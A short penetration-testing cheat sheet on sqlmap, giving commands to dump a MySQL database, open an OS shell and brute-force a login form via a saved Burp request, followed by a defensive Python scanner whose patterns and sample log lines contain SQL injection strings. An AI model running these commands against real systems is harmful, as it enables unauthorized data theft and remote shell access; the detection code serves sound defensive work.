sqlmap
Automate database dump:
# sqlmap -u "http://10.10.10.10/debug.php?id=1" -p "id" --dbms=mysql --dump
--dbms sets the backend database type.
--dump dumps all.
Execute a shell:
# sqlmap -u "http://10.10.10.10/debug.php?id=1" -p "id" --dbms=mysql --os-shell
Login Portal, SQL Brute Force:
If you have a login prompt that you suspect may be injectable, set up Burp to capture the traffic. Next, try to authenticate with admin:admin and capture the request with Burp. Copy the raw request into a file, login.req. You may have to clean up the spacing of the request after the copy and paste. Then hand it to sqlmap:
# sqlmap -r login.req
// This will automatically brute-force SQL injection to attempt a login.
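Seen from the defending side, runs like the ones above leave traces in the web server's access log. The following is an added example, not part of the original notes: a small scanner that flags sqlmap's default User-Agent and SQL syntax in query parameters. The log lines, source addresses and the sqlmap version string are constructed sample data, and the pattern list is an assumption that should be tuned per application.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /debug.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /debug.php?id=1%20AND%205=5 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET /debug.php?id=1%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 498 "-" "Mozilla/5.0"
192.168.1.20 - - [01/Jan/2024:10:00:04 +0000] "GET /debug.php?id=7 HTTP/1.1" 200 530 "-" "Mozilla/5.0"
192.168.1.21 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=student+union HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# source, method, request target and User-Agent from a combined-format line
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
# SQL syntax that has no business inside an id-style parameter (assumed list)
SQLI_RE = re.compile(
    r"\bunion\b.+\bselect\b|\b(?:and|or)\b\s+\d+\s*=\s*\d+"
    r"|\bsleep\s*\(|\bbenchmark\s*\(|information_schema", re.IGNORECASE)

def scan(log_text):
    """Return (source, request target, reasons) for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined format; skip instead of guessing
        src, _method, target, agent = m.groups()
        reasons = []
        if agent.lower().startswith("sqlmap/"):
            reasons.append("sqlmap user-agent")
        # parse_qsl URL-decodes values, so %20 and + become spaces before matching
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if SQLI_RE.search(value):
                reasons.append(f"sql syntax in parameter '{name}'")
        if reasons:
            findings.append((src, target, reasons))
    return findings

def hits_per_source(findings):
    """Count flagged requests per client address to spot a scanning burst."""
    return Counter(src for src, _target, _reasons in findings)

if __name__ == "__main__":
    for src, target, reasons in scan(SAMPLE_LOG):
        print(src, target, "; ".join(reasons))
    print(dict(hits_per_source(scan(SAMPLE_LOG))))
```

The User-Agent check only catches runs that keep sqlmap's default header; a request replayed with -r carries the headers saved in the request file. A POST login body does not appear in an access log, so covering the login case needs request-body logging or a WAF in front of the form.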
More coming soon!